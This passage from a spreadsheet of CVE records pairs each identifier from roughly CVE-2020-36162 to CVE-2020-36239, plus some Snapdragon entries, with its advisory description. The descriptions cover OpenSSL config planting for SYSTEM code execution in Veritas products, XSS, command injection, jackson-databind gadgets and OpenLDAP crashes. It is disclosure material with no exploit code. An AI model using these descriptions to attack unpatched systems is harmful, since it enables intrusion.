    <t>An issue was discovered in Veritas CloudPoint before 8.3.0.1+hotfix. The CloudPoint Windows Agent leverages OpenSSL. This OpenSSL library attempts to load the \usr\local\ssl\openssl.cnf configuration file, which does not exist. By default, on Windows systems users can create directories under &lt;drive&gt;:\. A low privileged user can create a &lt;drive&gt;:\usr\local\ssl\openssl.cnf configuration file to load a malicious OpenSSL engine, which may result in arbitrary code execution. This would give the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc.</t>
  </si>
  <si>
    <t>CVE-2020-36163</t>
  </si>
  <si>
    <t>An issue was discovered in Veritas NetBackup and OpsCenter through 8.3.0.1. NetBackup processes using Strawberry Perl attempt to load and execute libraries from paths that do not exist by default on the Windows operating system. By default, on Windows systems, users can create directories under C:\. If a low privileged user on the Windows system creates an affected path with a library that NetBackup attempts to load, they can execute arbitrary code as SYSTEM or Administrator. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc. This affects NetBackup master servers, media servers, clients, and OpsCenter servers on the Windows platform. The system is vulnerable during an install or upgrade on all systems and post-install on Master, Media, and OpsCenter servers during normal operations.</t>
  </si>
  <si>
    <t>CVE-2020-36164</t>
  </si>
  <si>
    <t>An issue was discovered in Veritas Enterprise Vault through 14.0. On start-up, it loads the OpenSSL library. The OpenSSL library then attempts to load the openssl.cnf configuration file (which does not exist) at the following locations in both the System drive (typically C:\) and the product's installation drive (typically not C:\): \Isode\etc\ssl\openssl.cnf (on SMTP Server) or \user\ssl\openssl.cnf (on other affected components). By default, on Windows systems, users can create directories under C:\. A low privileged user can create a openssl.cnf configuration file to load a malicious OpenSSL engine, resulting in arbitrary code execution as SYSTEM when the service starts. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc. This vulnerability only affects a server with MTP Server, SMTP Archiving IMAP Server, IMAP Archiving, Vault Cloud Adapter, NetApp File server, or File System Archiving for NetApp as File Server.</t>
  </si>
  <si>
    <t>CVE-2020-36165</t>
  </si>
  <si>
    <t>An issue was discovered in Veritas Desktop and Laptop Option (DLO) before 9.4. On start-up, it loads the OpenSSL library from /ReleaseX64/ssl. This library attempts to load the /ReleaseX64/ssl/openssl.cnf configuration file, which does not exist. By default, on Windows systems, users can create directories under C:\. A low privileged user can create a C:/ReleaseX64/ssl/openssl.cnf configuration file to load a malicious OpenSSL engine, resulting in arbitrary code execution as SYSTEM when the service starts. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc. This impacts DLO server and client installations.</t>
  </si>
  <si>
    <t>CVE-2020-36166</t>
  </si>
  <si>
    <t>An issue was discovered in Veritas InfoScale 7.x through 7.4.2 on Windows, Storage Foundation through 6.1 on Windows, Storage Foundation HA through 6.1 on Windows, and InfoScale Operations Manager (aka VIOM) Windows Management Server 7.x through 7.4.2. On start-up, it loads the OpenSSL library from \usr\local\ssl. This library attempts to load the \usr\local\ssl\openssl.cnf configuration file, which may not exist. On Windows systems, this path could translate to &lt;drive&gt;:\usr\local\ssl\openssl.cnf, where &lt;drive&gt; could be the default Windows installation drive such as C:\ or the drive where a Veritas product is installed. By default, on Windows systems, users can create directories under any top-level directory. A low privileged user can create a &lt;drive&gt;:\usr\local\ssl\openssl.cnf configuration file to load a malicious OpenSSL engine, resulting in arbitrary code execution as SYSTEM when the service starts. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc.</t>
  </si>
  <si>
    <t>CVE-2020-36167</t>
  </si>
  <si>
    <t>An issue was discovered in the server in Veritas Backup Exec through 16.2, 20.6 before hotfix 298543, and 21.1 before hotfix 657517. On start-up, it loads the OpenSSL library from the Installation folder. This library in turn attempts to load the /usr/local/ssl/openssl.cnf configuration file, which may not exist. On Windows systems, this path could translate to &lt;drive&gt;:\usr\local\ssl\openssl.cnf. A low privileged user can create a :\usr\local\ssl\openssl.cnf configuration file to load a malicious OpenSSL engine, resulting in arbitrary code execution as SYSTEM when the service starts. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc. If the system is also an Active Directory domain controller, then this can affect the entire domain.</t>
  </si>
  <si>
    <t>CVE-2020-36168</t>
  </si>
  <si>
    <t>An issue was discovered in Veritas Resiliency Platform 3.4 and 3.5. It leverages OpenSSL on Windows systems when using the Managed Host addon. On start-up, it loads the OpenSSL library. This library may attempt to load the openssl.cnf configuration file, which does not exist. By default, on Windows systems, users can create directories under C:\. A low privileged user can create a C:\usr\local\ssl\openssl.cnf configuration file to load a malicious OpenSSL engine, resulting in arbitrary code execution as SYSTEM when the service starts. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc.</t>
  </si>
  <si>
    <t>CVE-2020-36169</t>
  </si>
  <si>
    <t>An issue was discovered in Veritas NetBackup through 8.3.0.1 and OpsCenter through 8.3.0.1. Processes using OpenSSL attempt to load and execute libraries from paths that do not exist by default on the Windows operating system. By default, on Windows systems, users can create directories under the top level of any drive. If a low privileged user creates an affected path with a library that the Veritas product attempts to load, they can execute arbitrary code as SYSTEM or Administrator. This gives the attacker administrator access on the system, allowing the attacker (by default) to access all data, access all installed applications, etc. This vulnerability affects master servers, media servers, clients, and OpsCenter servers on the Windows platform. The system is vulnerable during an install or upgrade and post-install during normal operations.</t>
  </si>
  <si>
    <t>CVE-2020-3617</t>
  </si>
  <si>
    <t>u'Buffer over-read Issue in Q6 testbus framework due to diag packet length is not completely validated before accessing the field and leads to Information disclosure.' in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in Kamorta, Nicobar, QCS605, QCS610, Rennell, SC7180, SDA660, SDM630, SDM636, SDM660, SDM670, SDM710, SM6150, SM7150, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-36170</t>
  </si>
  <si>
    <t>The Ultimate Member plugin before 2.1.13 for WordPress mishandles hidden name="timestamp" fields in forms.</t>
  </si>
  <si>
    <t>CVE-2020-36171</t>
  </si>
  <si>
    <t>The Elementor Website Builder plugin before 3.0.14 for WordPress does not properly restrict SVG uploads.</t>
  </si>
  <si>
    <t>CVE-2020-36172</t>
  </si>
  <si>
    <t>The Advanced Custom Fields plugin before 5.8.12 for WordPress mishandles the escaping of strings in Select2 dropdowns, potentially leading to XSS.</t>
  </si>
  <si>
    <t>CVE-2020-36173</t>
  </si>
  <si>
    <t>The Ninja Forms plugin before 3.4.28 for WordPress lacks escaping for submissions-table fields.</t>
  </si>
  <si>
    <t>CVE-2020-36174</t>
  </si>
  <si>
    <t>The Ninja Forms plugin before 3.4.27.1 for WordPress allows CSRF via services integration.</t>
  </si>
  <si>
    <t>CVE-2020-36175</t>
  </si>
  <si>
    <t>The Ninja Forms plugin before 3.4.27.1 for WordPress allows attackers to bypass validation via the email field.</t>
  </si>
  <si>
    <t>CVE-2020-36176</t>
  </si>
  <si>
    <t>The iThemes Security (formerly Better WP Security) plugin before 7.7.0 for WordPress does not enforce a new-password requirement for an existing account until the second login occurs.</t>
  </si>
  <si>
    <t>CVE-2020-36177</t>
  </si>
  <si>
    <t>RsaPad_PSS in wolfcrypt/src/rsa.c in wolfSSL before 4.6.0 has an out-of-bounds write for certain relationships between key size and digest size.</t>
  </si>
  <si>
    <t>CVE-2020-36178</t>
  </si>
  <si>
    <t>oal_ipt_addBridgeIsolationRules on TP-Link TL-WR840N 6_EU_0.9.1_4.16 devices allows OS command injection because a raw string entered from the web interface (an IP address field) is used directly for a call to the system library function (for iptables). NOTE: oal_ipt_addBridgeIsolationRules is not the only function that calls util_execSystem.</t>
  </si>
  <si>
    <t>CVE-2020-36179</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.</t>
  </si>
  <si>
    <t>CVE-2020-3618</t>
  </si>
  <si>
    <t>NULL exception due to accessing bad pointer while posting events on RT FIFO in Snapdragon Compute, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking in IPQ6018, IPQ8074, QCA8081, SC8180X, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36180</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.</t>
  </si>
  <si>
    <t>CVE-2020-36181</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS.</t>
  </si>
  <si>
    <t>CVE-2020-36182</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.</t>
  </si>
  <si>
    <t>CVE-2020-36183</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool.</t>
  </si>
  <si>
    <t>CVE-2020-36184</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.</t>
  </si>
  <si>
    <t>CVE-2020-36185</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource.</t>
  </si>
  <si>
    <t>CVE-2020-36186</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource.</t>
  </si>
  <si>
    <t>CVE-2020-36187</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource.</t>
  </si>
  <si>
    <t>CVE-2020-36188</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource.</t>
  </si>
  <si>
    <t>CVE-2020-36189</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource.</t>
  </si>
  <si>
    <t>CVE-2020-3619</t>
  </si>
  <si>
    <t>u'Non-secure memory is touched multiple times during TrustZone\u2019s execution and can lead to privilege escalation or memory corruption' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8098, IPQ8074, Kamorta, MDM9150, MDM9206, MDM9607, MDM9650, MSM8905, MSM8909, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8998, QCA8081, QCS404, QCS605, QCS610, QM215, Rennell, SA415M, SC7180, SDA660, SDA845, SDM429, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX24, SM6150, SM7150, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-36190</t>
  </si>
  <si>
    <t>RailsAdmin (aka rails_admin) before 1.4.3 and 2.x before 2.0.2 allows XSS via nested forms.</t>
  </si>
  <si>
    <t>CVE-2020-36191</t>
  </si>
  <si>
    <t>JupyterHub 1.1.0 allows CSRF in the admin panel via a request that lacks an _xsrf field, as demonstrated by a /hub/api/user request (to add or remove a user account).</t>
  </si>
  <si>
    <t>CVE-2020-36192</t>
  </si>
  <si>
    <t>An issue was discovered in the Source Integration plugin before 2.4.1 for MantisBT. An attacker can gain access to the Summary field of private Issues (either marked as Private, or part of a private Project), if they are attached to an existing Changeset. The information is visible on the view.php page, as well as on the list.php page (a pop-up on the Affected Issues id hyperlink). Additionally, if the attacker has "Update threshold" in the plugin's configuration (set to the "updater" access level by default), then they can link any Issue to a Changeset by entering the Issue's Id, even if they do not have access to it.</t>
  </si>
  <si>
    <t>CVE-2020-36193</t>
  </si>
  <si>
    <t>Tar.php in Archive_Tar through 1.4.11 allows write operations with Directory Traversal due to inadequate checking of symbolic links, a related issue to CVE-2020-28948.</t>
  </si>
  <si>
    <t>CVE-2020-36194</t>
  </si>
  <si>
    <t>An XSS vulnerability has been reported to affect QNAP NAS running QTS and QuTS hero. If exploited, this vulnerability allows attackers to inject malicious code. This issue affects: QNAP Systems Inc. QTS versions prior to 4.5.2.1566 Build 20210202. QNAP Systems Inc. QuTS hero versions prior to h4.5.2.1638 build 20210414. This issue does not affect: QNAP Systems Inc. QTS 4.5.3.</t>
  </si>
  <si>
    <t>CVE-2020-36195</t>
  </si>
  <si>
    <t>An SQL injection vulnerability has been reported to affect QNAP NAS running Multimedia Console or the Media Streaming add-on. If exploited, the vulnerability allows remote attackers to obtain application information. QNAP has already fixed this vulnerability in the following versions of Multimedia Console and the Media Streaming add-on. QTS 4.3.3: Media Streaming add-on 430.1.8.10 and later QTS 4.3.6: Media Streaming add-on 430.1.8.8 and later QTS 4.4.x and later: Multimedia Console 1.3.4 and later We have also fixed this vulnerability in the following versions of QTS 4.3.3 and QTS 4.3.6, respectively: QTS 4.3.3.1624 Build 20210416 or later QTS 4.3.6.1620 Build 20210322 or later</t>
  </si>
  <si>
    <t>CVE-2020-36196</t>
  </si>
  <si>
    <t>A stored XSS vulnerability has been reported to affect QNAP NAS running QuLog Center. If exploited, this vulnerability allows attackers to inject malicious code. This issue affects: QNAP Systems Inc. QuLog Center versions prior to 1.2.0.</t>
  </si>
  <si>
    <t>CVE-2020-36197</t>
  </si>
  <si>
    <t>An improper access control vulnerability has been reported to affect earlier versions of Music Station. If exploited, this vulnerability allows attackers to compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc. This issue affects: QNAP Systems Inc. Music Station versions prior to 5.3.16 on QTS 4.5.2; versions prior to 5.2.10 on QTS 4.3.6; versions prior to 5.1.14 on QTS 4.3.3; versions prior to 5.3.16 on QuTS hero h4.5.2; versions prior to 5.3.16 on QuTScloud c4.5.4.</t>
  </si>
  <si>
    <t>CVE-2020-36198</t>
  </si>
  <si>
    <t>A command injection vulnerability has been reported to affect certain versions of Malware Remover. If exploited, this vulnerability allows remote attackers to execute arbitrary commands. This issue affects: QNAP Systems Inc. Malware Remover versions prior to 4.6.1.0. This issue does not affect: QNAP Systems Inc. Malware Remover 3.x.</t>
  </si>
  <si>
    <t>CVE-2020-36199</t>
  </si>
  <si>
    <t>TinyCheck before commits 9fd360d and ea53de8 was vulnerable to command injection due to insufficient checks of input parameters in several places.</t>
  </si>
  <si>
    <t>CVE-2020-3620</t>
  </si>
  <si>
    <t>u'Lack of check of integer overflow while doing a round up operation for data read from shared memory for G-link SMEM transport can lead to corruption and potential information leak' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Bitra, IPQ6018, IPQ8074, Kamorta, MDM9150, MDM9205, MDM9206, MDM9607, MDM9640, MDM9645, MDM9650, MDM9655, MSM8905, MSM8909, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8998, Nicobar, QCA8081, QCM2150, QCN7605, QCS404, QCS405, QCS605, QCS610, QM215, Rennell, SA415M, SA6155P, Saipan, SC7180, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36200</t>
  </si>
  <si>
    <t>TinyCheck before commits 9fd360d and ea53de8 allowed an authenticated attacker to send an HTTP GET request to the crafted URLs.</t>
  </si>
  <si>
    <t>CVE-2020-36201</t>
  </si>
  <si>
    <t>An issue was discovered in certain Xerox WorkCentre products. They do not properly encrypt passwords. This affects 3655, 3655i, 58XX, 58XXi 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices.</t>
  </si>
  <si>
    <t>CVE-2020-36202</t>
  </si>
  <si>
    <t>An issue was discovered in the async-h1 crate before 2.3.0 for Rust. Request smuggling can occur when used behind a reverse proxy.</t>
  </si>
  <si>
    <t>CVE-2020-36203</t>
  </si>
  <si>
    <t>An issue was discovered in the reffers crate through 2020-12-01 for Rust. ARefss can contain a !Send,!Sync object, leading to a data race and memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-36204</t>
  </si>
  <si>
    <t>An issue was discovered in the im crate through 2020-11-09 for Rust. Because TreeFocus does not have bounds on its Send trait or Sync trait, a data race can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36205</t>
  </si>
  <si>
    <t>An issue was discovered in the xcb crate through 2020-12-10 for Rust. base::Error does not have soundness. Because of the public ptr field, a use-after-free or double-free can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36206</t>
  </si>
  <si>
    <t>An issue was discovered in the rusb crate before 0.7.0 for Rust. Because of a lack of Send and Sync bounds, a data race and memory corruption can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36207</t>
  </si>
  <si>
    <t>An issue was discovered in the aovec crate through 2020-12-10 for Rust. Because Aovec&lt;T&gt; does not have bounds on its Send trait or Sync trait, a data race and memory corruption can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36208</t>
  </si>
  <si>
    <t>An issue was discovered in the conquer-once crate before 0.3.2 for Rust. Thread crossing can occur for a non-Send but Sync type, leading to memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-36209</t>
  </si>
  <si>
    <t>An issue was discovered in the late-static crate before 0.4.0 for Rust. Because Sync is implemented for LateStatic with T: Send, a data race can occur.</t>
  </si>
  <si>
    <t>CVE-2020-3621</t>
  </si>
  <si>
    <t>u'Lack of check to ensure that the TX read index &amp; RX write index that are read from shared memory are less than the FIFO size results into memory corruption and potential information leakage' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Bitra, IPQ6018, IPQ8074, Kamorta, MDM9150, MDM9205, MDM9206, MDM9607, MDM9640, MDM9645, MDM9650, MDM9655, MSM8905, MSM8909, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8998, Nicobar, QCA8081, QCM2150, QCN7605, QCS404, QCS405, QCS605, QCS610, QM215, Rennell, SA415M, SA6155P, Saipan, SC7180, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36210</t>
  </si>
  <si>
    <t>An issue was discovered in the autorand crate before 0.2.3 for Rust. Because of impl Random on arrays, uninitialized memory can be dropped when a panic occurs, leading to memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-36211</t>
  </si>
  <si>
    <t>An issue was discovered in the gfwx crate before 0.3.0 for Rust. Because ImageChunkMut does not have bounds on its Send trait or Sync trait, a data race and memory corruption can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36212</t>
  </si>
  <si>
    <t>An issue was discovered in the abi_stable crate before 0.9.1 for Rust. DrainFilter lacks soundness because of a double drop.</t>
  </si>
  <si>
    <t>CVE-2020-36213</t>
  </si>
  <si>
    <t>An issue was discovered in the abi_stable crate before 0.9.1 for Rust. A retain call can create an invalid UTF-8 string, violating soundness.</t>
  </si>
  <si>
    <t>CVE-2020-36214</t>
  </si>
  <si>
    <t>An issue was discovered in the multiqueue2 crate before 0.1.7 for Rust. Because a non-Send type can be sent to a different thread, a data race can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36215</t>
  </si>
  <si>
    <t>An issue was discovered in the hashconsing crate before 1.1.0 for Rust. Because HConsed does not have bounds on its Send trait or Sync trait, memory corruption can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36216</t>
  </si>
  <si>
    <t>An issue was discovered in Input&lt;R&gt; in the eventio crate before 0.5.1 for Rust. Because a non-Send type can be sent to a different thread, a data race and memory corruption can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36217</t>
  </si>
  <si>
    <t>An issue was discovered in the may_queue crate through 2020-11-10 for Rust. Because Queue does not have bounds on its Send trait or Sync trait, memory corruption can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36218</t>
  </si>
  <si>
    <t>An issue was discovered in the buttplug crate before 1.0.4 for Rust. ButtplugFutureStateShared does not properly consider (!Send|!Sync) objects, leading to a data race.</t>
  </si>
  <si>
    <t>CVE-2020-36219</t>
  </si>
  <si>
    <t>An issue was discovered in the atomic-option crate through 2020-10-31 for Rust. Because AtomicOption&lt;T&gt; implements Sync unconditionally, a data race can occur.</t>
  </si>
  <si>
    <t>CVE-2020-3622</t>
  </si>
  <si>
    <t>u'Channel name string which has been read from shared memory is potentially subjected to string manipulations but not validated for NULL termination can results into memory corruption' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Bitra, IPQ6018, IPQ8074, Kamorta, MDM9150, MDM9205, MDM9206, MDM9607, MDM9640, MDM9645, MDM9650, MDM9655, MSM8905, MSM8909, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8998, Nicobar, QCA8081, QCM2150, QCN7605, QCS404, QCS405, QCS605, QCS610, QM215, Rennell, SA415M, SA6155P, Saipan, SC7180, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36220</t>
  </si>
  <si>
    <t>An issue was discovered in the va-ts crate before 0.0.4 for Rust. Because Demuxer&lt;T&gt; omits a required T: Send bound, a data race and memory corruption can occur.</t>
  </si>
  <si>
    <t>CVE-2020-36221</t>
  </si>
  <si>
    <t>An integer underflow was discovered in OpenLDAP before 2.4.57 leading to slapd crashes in the Certificate Exact Assertion processing, resulting in denial of service (schema_init.c serialNumberAndIssuerCheck).</t>
  </si>
  <si>
    <t>CVE-2020-36222</t>
  </si>
  <si>
    <t>A flaw was discovered in OpenLDAP before 2.4.57 leading to an assertion failure in slapd in the saslAuthzTo validation, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-36223</t>
  </si>
  <si>
    <t>A flaw was discovered in OpenLDAP before 2.4.57 leading to a slapd crash in the Values Return Filter control handling, resulting in denial of service (double free and out-of-bounds read).</t>
  </si>
  <si>
    <t>CVE-2020-36224</t>
  </si>
  <si>
    <t>A flaw was discovered in OpenLDAP before 2.4.57 leading to an invalid pointer free and slapd crash in the saslAuthzTo processing, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-36225</t>
  </si>
  <si>
    <t>A flaw was discovered in OpenLDAP before 2.4.57 leading to a double free and slapd crash in the saslAuthzTo processing, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-36226</t>
  </si>
  <si>
    <t>A flaw was discovered in OpenLDAP before 2.4.57 leading to a memch-&gt;bv_len miscalculation and slapd crash in the saslAuthzTo processing, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-36227</t>
  </si>
  <si>
    <t>A flaw was discovered in OpenLDAP before 2.4.57 leading to an infinite loop in slapd with the cancel_extop Cancel operation, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-36228</t>
  </si>
  <si>
    <t>An integer underflow was discovered in OpenLDAP before 2.4.57 leading to a slapd crash in the Certificate List Exact Assertion processing, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-36229</t>
  </si>
  <si>
    <t>A flaw was discovered in ldap_X509dn2bv in OpenLDAP before 2.4.57 leading to a slapd crash in the X.509 DN parsing in ad_keystring, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-3623</t>
  </si>
  <si>
    <t>kernel failure due to load failures while running v1 path directly via kernel in Snapdragon Mobile in SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36230</t>
  </si>
  <si>
    <t>A flaw was discovered in OpenLDAP before 2.4.57 leading in an assertion failure in slapd in the X.509 DN parsing in decode.c ber_next_element, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-36231</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to view the metadata of boards they should not have access to via an Insecure Direct Object References (IDOR) vulnerability. The affected versions are before version 8.5.10, and from version 8.6.0 before 8.13.2.</t>
  </si>
  <si>
    <t>CVE-2020-36232</t>
  </si>
  <si>
    <t>The MessageBundleWhiteList class of atlassian-gadgets before version 4.2.37, from version 4.3.0 before 4.3.14, from version 4.3.2.0 before 4.3.2.4, from version 4.4.0 before 4.4.12, and from version 5.0.0 before 5.0.1 allowed unexpected DNS lookups and requests to arbitrary services as it incorrectly obtained application base url information from the executing http request which could be attacker controlled.</t>
  </si>
  <si>
    <t>CVE-2020-36233</t>
  </si>
  <si>
    <t>The Microsoft Windows Installer for Atlassian Bitbucket Server and Data Center before version 6.10.9, 7.x before 7.6.4, and from version 7.7.0 before 7.10.1 allows local attackers to escalate privileges because of weak permissions on the installation directory.</t>
  </si>
  <si>
    <t>CVE-2020-36234</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the Screens Modal view. The affected versions are before version 8.5.11, from version 8.6.0 before 8.13.3, and from version 8.14.0 before 8.15.0.</t>
  </si>
  <si>
    <t>CVE-2020-36235</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to view custom field and custom SLA names via an Information Disclosure vulnerability in the mobile site view. The affected versions are before version 8.13.2, and from version 8.14.0 before 8.14.1.</t>
  </si>
  <si>
    <t>CVE-2020-36236</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the ViewWorkflowSchemes.jspa and ListWorkflows.jspa endpoints. The affected versions are before version 8.5.11, from version 8.6.0 before 8.13.3, and from version 8.14.0 before 8.15.0.</t>
  </si>
  <si>
    <t>CVE-2020-36237</t>
  </si>
  <si>
    <t>Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to view custom field options via an Information Disclosure vulnerability in the /rest/api/2/customFieldOption/ endpoint. The affected versions are before version 8.15.0.</t>
  </si>
  <si>
    <t>CVE-2020-36238</t>
  </si>
  <si>
    <t>The /rest/api/1.0/render resource in Jira Server and Data Center before version 8.5.13, from version 8.6.0 before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to determine if a username is valid or not via a missing permissions check.</t>
  </si>
  <si>
    <t>CVE-2020-36239</t>
  </si>
  <si>
    <t>Jira Data Center, Jira Core Data Center, Jira Software Data Center from version 6.3.0 before 8.5.16, from 8.6.0 before 8.13.8, from 8.14.0 before 8.17.0 and Jira Service Management Data Center from version 2.0.2 before 4.5.16, from version 4.6.0 before 4.13.8, and from version 4.14.0 before 4.17.0 exposed a Ehcache RMI network service which attackers, who can connect to the service, on port 40001 and potentially 40011[0][1], could execute arbitrary code of their choice in Jira through deserialization due to a missing authentication vulnerability. While Atlassian strongly suggests restricting access to the Ehcache ports to only Data Center instances, fixed versions of Jira will now require a shared secret in order to allow access to the Ehcache service. [0] In Jira Data Center, Jira Core Data Center, and Jira Software Data Center versions prior to 7.13.1, the Ehcache object port can be randomly allocated. [1] In Jira Service Management Data Center versions prior to 3.16.1, the Ehcache object port can be randomly allocated.</t>
  </si>
  <si>
    <t>CVE-2020-3624</t>
  </si>
  <si>
